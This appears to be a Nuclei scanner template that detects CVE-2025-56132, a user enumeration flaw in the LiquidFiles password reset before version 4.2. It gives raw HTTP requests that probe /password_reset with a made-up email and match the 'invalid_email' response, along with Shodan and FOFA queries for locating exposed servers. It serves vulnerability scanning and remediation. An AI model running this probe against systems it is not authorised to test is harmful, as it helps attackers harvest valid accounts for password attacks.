id: CVE-2025-56132 info: name: LiquidFiles < 4.2 - User Enumeration via Password Reset author: DhiyaneshDk severity: high description: | LiquidFiles filetransfer server before 4.2 contains a user enumeration vulnerability caused by distinguishable responses in password reset functionality, letting unauthenticated attackers enumerate valid user accounts, exploit requires no authentication. impact: | Attackers can enumerate valid user emails, increasing risk of targeted password attacks and account compromise. remediation: | Update to version 4.2 or later which introduces user-based lockout mechanisms. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-56132 - https://docs.liquidfiles.com/release_notes/version_4-2-x.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2025-56132 cwe-id: CWE-305 epss-score: 0.02618 epss-percentile: 0.85934 metadata: verified: true max-request: 2 vendor: liquidfiles product: liquidfiles shodan-query: http.title:"LiquidFiles" fofa-query: title="LiquidFiles" tags: cve,cve2025,liquidfiles,user-enum,vkev flow: http(1) && http(2) variables: email: "nonexistent-user-enumtest-{{rand_int(10000,99999)}}@test.invalid" http: - raw: - | POST /password_reset HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user[email]={{email}} matchers: - type: dsl dsl: - "contains(set_cookie, '_filetransfer_session')" - "status_code == 302" condition: and internal: true - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "contains_all(body, 'invalid_email','LiquidFiles')" - "status_code == 200" condition: and # digest: 4a0a0047304502207a5f734a5d6bceda04207281918a79ce4ffc9ed4d21b5620cb8e20ff6a6da220022100e872f5d43a3506e99752be6ec9b97c7ca918eb1e434baec9d364d738f6e00e07:922c64590222798bb761d5b6d8e72950